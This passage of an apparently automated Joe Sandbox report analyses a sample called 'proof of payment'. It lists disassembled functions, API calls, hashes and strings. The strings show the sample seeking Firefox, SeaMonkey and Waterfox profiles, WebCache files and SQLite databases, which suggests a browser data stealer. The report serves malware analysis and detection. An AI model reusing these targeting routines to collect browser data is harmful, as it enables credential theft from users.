                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403DDA
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                      • String ID: Waterfox$Waterfox\Profiles
                                      • API String ID: 3527940856-11920434
                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00403E50
                                      • memset.MSVCRT ref: 00403E65
                                      • memset.MSVCRT ref: 00403E7A
                                      • memset.MSVCRT ref: 00403E8F
                                      • memset.MSVCRT ref: 00403EA4
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403F6B
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                      • API String ID: 3527940856-2068335096
                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00403FE1
                                      • memset.MSVCRT ref: 00403FF6
                                      • memset.MSVCRT ref: 0040400B
                                      • memset.MSVCRT ref: 00404020
                                      • memset.MSVCRT ref: 00404035
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 004040FC
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                      • API String ID: 3527940856-3369679110
                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                      • API String ID: 3510742995-2641926074
                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 004033B7
                                      • memcpy.MSVCRT ref: 004033D0
                                      • wcscmp.MSVCRT ref: 004033FC
                                      • _wcsicmp.MSVCRT ref: 00403439
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                      • String ID: $0.@
                                      • API String ID: 3030842498-1896041820
                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 2941347001-0
                                      • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                      • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00403C09
                                      • memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                      • wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                      • wcscat.MSVCRT ref: 00403C70
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memsetwcscat$Closewcscpywcslen
                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                      • API String ID: 3249829328-1174173950
                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040A824
                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • wcscpy.MSVCRT ref: 0040A854
                                      • wcscat.MSVCRT ref: 0040A86A
                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 669240632-0
                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcschr.MSVCRT ref: 00414458
                                      • _snwprintf.MSVCRT ref: 0041447D
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                      • String ID: "%s"
                                      • API String ID: 1343145685-3297466227
                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProcessTimes
                                      • String ID: GetProcessTimes$kernel32.dll
                                      • API String ID: 1714573020-3385500049
                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004087D6
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                      • memset.MSVCRT ref: 00408828
                                      • memset.MSVCRT ref: 00408840
                                      • memset.MSVCRT ref: 00408858
                                      • memset.MSVCRT ref: 00408870
                                      • memset.MSVCRT ref: 00408888
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                      • String ID:
                                      • API String ID: 2911713577-0
                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: @ $SQLite format 3
                                      • API String ID: 1475443563-3708268960
                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      • memset.MSVCRT ref: 00414C87
                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                      • wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressCloseProcVersionmemsetwcscpy
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                      • API String ID: 2705122986-2036018995
                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmpqsort
                                      • String ID: /nosort$/sort
                                      • API String ID: 1579243037-1578091866
                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040E60F
                                      • memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Strings
                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                      • API String ID: 3354267031-2114579845
                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID:
                                      • API String ID: 3473537107-0
                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                      • API String ID: 2221118986-1725073988
                                      • Opcode ID: 048d8ebac314828999dc99bd83d8a91ef0803223d3a13c5c6c473df875debe00
                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                      • Opcode Fuzzy Hash: 048d8ebac314828999dc99bd83d8a91ef0803223d3a13c5c6c473df875debe00
                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotificationSleep
                                      • String ID: }A
                                      • API String ID: 1821831730-2138825249
                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
